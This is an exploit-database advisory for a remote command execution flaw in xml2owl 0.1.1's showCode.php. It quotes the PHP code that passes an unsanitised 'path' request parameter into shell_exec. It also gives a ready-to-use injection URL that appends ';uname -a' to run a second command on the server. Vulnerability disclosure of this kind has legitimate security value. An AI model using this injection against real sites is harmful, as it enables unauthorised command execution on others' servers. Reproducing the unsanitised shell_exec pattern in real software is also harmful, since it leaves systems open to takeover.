[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

xml2owl 0.1.1 showCode.php Remote Command Execution Vulnerability

Author
MhZ91
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-2414
Category
web applications
Date add
28-12-2007
Platform
unsorted
=================================================================
xml2owl 0.1.1 showCode.php Remote Command Execution Vulnerability
=================================================================



---------------------------------------------------------------
 ____            __________         __             ____  __  
/_   | ____     |__\_____  \  _____/  |_          /_   |/  |_
 |   |/    \    |  | _(__  <_/ ___\   __\  ______  |   \   __\
 |   |   |  \   |  |/       \  \___|  |   /_____/  |   ||  | 
 |___|___|  /\__|  /______  /\___  >__|            |___||__| 
          \/\______|      \/     \/                          

---------------------------------------------------------------

          Remote Command Execution

---------------------------------------------------------------

# Author: MhZ91
# Title: xml2owl-0.1.1 - Remote Command Execution
# Download: http://surfnet.dl.sourceforge.net/sourceforge/xml2owl/xml2owl-0.1.1.tar.bz2
# Bug: Remote Command Execution
# Info: Up to now, most ontologies are created manually, which is very time-expensive. The goal is it, to produce ontologies automatically via XSLT, which fit as good as possible to a given XML-file resp. XML-Schema-file

---------------------------------------------------------------

In the file showCode.php there is this... 

<?
	$xml2html = "xsl/xmlverbatim.xsl";
	$path = $_REQUEST['path']; <- 
	
  if(class_exists('XSLTProcessor')) {
    $xsl = new XSLTProcessor();
    
    $res = DOMDocument::load($path);
  
    $xsl->importStylesheet(DOMDocument::load($xml2html));
    echo $xsl->transformToXML($res);
  }
  else {
    $exec_string = "xsltproc " . $xml2html . " " . $path; <-
    echo shell_exec($exec_string); <-
  }
?>

We can modify the $path variable.. and give a remote command execution by the function shell_exec.. 

Type http://www.site.com/showCode.php?path=;uname -a

... 

---------------------------------------------------------------



#  0day.today [2024-11-15]  #